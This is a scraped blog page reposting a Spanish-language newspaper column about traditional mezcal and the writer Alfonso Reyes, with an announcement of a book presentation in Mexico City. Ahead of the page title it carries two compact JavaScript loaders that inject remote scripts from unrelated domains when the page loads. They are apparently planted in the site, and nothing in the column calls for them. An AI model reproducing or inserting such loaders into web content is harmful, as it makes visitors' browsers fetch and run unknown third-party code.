;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 24. Mezcal para Reyes

24. Mezcal para Reyes


A los Maestros Mezcalilleros, en su día.

Hace meses escuché decir que “el mezcal ya comienza a llegar a las mejores mesas de México”, como si las de los maestros mezcalilleros y las de sus comunidades fueran de menor valía. Esta infamia muestra que, ¡en pleno siglo XXI!, aún no termina por entenderse quiénes son los auténticos creadores, expertos y preservadores de las extraordinarias gastronomías regionales que hay en nuestro país.
Pareciera que el título de la columna repitiese la infamia, pero en realidad se refiere a nuestro eximio hombre de letras Alfonso Reyes Ochoa, nacido en 1889 en Monterrey, Nuevo León, estado en el que, por cierto, también existe una antigua y documentada tradición mezcalera. Esta afirmación se comprueba al leer la tesis Fabricación de Mezcal de Gabriel Somera (1952), donde aparece un cuadro estadístico con nombres de poblaciones neoleonesas donde se elaboraba mezcal: La Gloria, Las Mulas, Sultana, Unión, La India, Camarones, Colorada, Lampazos y Bonita.
Refiero lo anterior porque en la vasta obra del regiomontano la gastronomía también está incluida. Tal es el caso de Memorias de cocina y bodega (Tezontle, FCE, 1953), en las que hay una fugacísima mención, en el Descanso XIV, sobre nuestros mezcales. En estos sabrosos apuntes –así llamados por su autor-, nos hace un erudito recuento gastronómico de diferentes países, entre ellos Brasil, donde fue embajador de México entre 1930 y 1936.
Y es precisamente este período de la vida del escritor el tema de ALFONSO REYES EN LOS ALBORES DEL ESTADO NUEVO BRASILEÑO (1930-1936), libro de Alberto Enríquez Perea editado por El Colegio Nacional en 2009, que será presentado por Ileana Cid y Héctor Cuadra. Por supuesto que habrá mezcal tradicional –en memoria de Don Alfonso-, pero de Puebla, ya que el autor es nativo de Izúcar de Matamoros. La cita es en la Capilla Alfonsina: Benjamín Hill 12, col. Condesa, Ciudad de México, lunes 17 de mayo a las 18:00 horas. Entrada y mezcal serán gratuitos; el libro, por cuenta del lector.
http://impreso.milenio.com/node/8767808

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *